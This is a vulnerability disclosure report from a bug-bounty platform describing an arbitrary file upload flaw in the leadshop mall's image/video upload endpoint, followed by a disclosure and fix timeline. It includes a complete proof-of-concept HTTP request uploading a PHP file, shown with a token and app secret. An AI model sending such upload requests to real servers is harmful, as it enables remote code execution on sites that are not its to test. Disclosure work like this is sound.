Unrestricted Upload of File with Dangerous Type in qmpaas/leadshop

Valid

Reported on

Dec 2nd 2021


Description

The vulnerability is in the api/ImageController.php file. image-20211202133840294

When $type is 2, it will enter the logic for uploading video files. However, the function $upload->video that handles video uploads does not detect the file suffix name. This results in arbitrary file uploads. image-20211202133922904

Proof of Concept

POST /index.php?q=/api/leadmall/image HTTP/1.1
Host: ???
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary="boundary"
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImF1ZCI6Imh0dHBzOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyIsImlhdCI6MTYzMTYwOTMxOSwiZXhwIjoxNjMxNjk1NzE5LCJpZCI6MX0.PdqX6vNh2LZ607lnd0J6JiU_Wf_SnPu3bbXVz4gfXEk
QM-APP-TYPE: undefined
QM-APP-ID: 98c08c25f8136d590c
QM-APP-SECRET: 3AYpU16dZ1CY7ejqvrE39B351vanLJVD
Content-Length: 1127
Origin: http://127.0.0.1:8777
Connection: close
Referer: http://127.0.0.1:8777/index.php?r=admin%2Findex
Cookie: _csrf=d31c94bc1ac116b99cf287a046dc1642965fba6d4232d378c5719685445276fba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22lrOxUbG2yPlq8P0DwPnuvxdNBXzu4wIh%22%3B%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

--boundary
Content-Disposition: form-data; name="type"

2
--boundary
Content-Disposition: form-data; name="content"; filename="test.php"

<?php phpinfo();
--boundary--

image-20211202135545988

Impact

This vulnerability can lead to users being able to upload arbitrary php files, which in turn can lead to RCE.

We are processing your report and will contact the qmpaas/leadshop team within 24 hours. 7 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 7 months ago
AFKL submitted a
3 months ago
leadshop开源商城 validated this vulnerability 3 months ago
AFKL has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the qmpaas/leadshop team. We will try again in 7 days. 3 months ago
We have sent a second fix follow up to the qmpaas/leadshop team. We will try again in 10 days. 3 months ago
We have sent a third and final fix follow up to the qmpaas/leadshop team. This report is now considered stale. 2 months ago
AFKL
a month ago

Researcher


Hello @admin, I noticed that the qmpaas/leadshop team seems to have fixed this vulnerability in an update two months ago (the update commit is https://github.com/qmpaas/leadshop/commit/b81e65c1d45a4ff418fa11122a4ec4397d9a1425). So what should we do next?🤔

Jamie Slome confirmed that a fix has been merged on b81e65 a month ago
The fix bounty has been dropped
Jamie Slome
a month ago

Admin


Sorted 👍

to join this conversation